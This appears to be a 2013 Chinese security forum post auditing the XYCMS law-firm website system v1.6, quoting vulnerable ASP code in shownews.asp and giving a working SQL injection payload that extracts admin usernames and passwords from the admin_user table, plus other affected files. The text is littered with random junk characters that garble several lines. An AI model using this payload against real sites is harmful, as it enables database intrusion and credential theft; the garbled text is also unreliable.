前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似* o+ o4 A- I" O0 z. h/ u( F* n' e
u7 H; I! u0 s' w+ {
淫荡分割线1 d& i5 d2 S: d. f9 a8 Y4 X
--------------------------------------------------------
3 p- f/ `+ Y d \+ n# L$ K
, p3 F e6 U4 L1 N, l审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
: e( v/ L; T6 F# q源码地址:http://down.chinaz.com/soft/29233.htm
8 l) \) B3 u5 z: p3 A' T
5 y, Y8 ~9 u+ K" G! u+ O漏洞文件:shownews.asp
' `4 o( A( c n漏洞代码:7-13行
3 }( F- Y3 J. v5 N- s' g/ g
! O' T0 w! T$ ?3 T6 O4 ?2 _8 g& w( T
) ]# C8 @. \+ L<% . Z5 p- D% h U% d o
id=request.QueryString("id")
. y8 F% z; ?2 N
0 E2 k) ^0 D: Y2 B4 M" kset snews=server.createobject("adodb.recordset") ! s/ j5 p$ H. ^4 h. R" A* q
exec="select * from [news] where id="&id
, W4 q% k% Q' q$ Osnews.open exec,conn,1,1" s: v- j# u) U+ O
%>
4 M$ X: \) C7 ?, c2 t! }, Q ' K, N. Q* a2 g g, Y/ n
6 [8 r0 b$ J. |) U! x. X, m( O% H; M什么过滤都没有 直造成注入
; e" }5 s" o' z k7 S I6 d% H9 U6 M4 |/ t
注入点:http://127.0.0.1:99/shownews.asp?id=xx
# t! e1 s ~& h) x+ G + o1 y) ]' {' N, j/ x# H
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
, y8 q3 I4 }$ A
/ z! H; A- d* v, X 3 b; j1 q& L- o. ~! W$ M
exp: union select 1,admin,password,4,5,7 from admin_user" R; @) y) P" D0 @; [7 N" [9 v
1 U1 l" I, k5 N
|
发表于 2013-4-4 17:28:12
收藏
支持
反对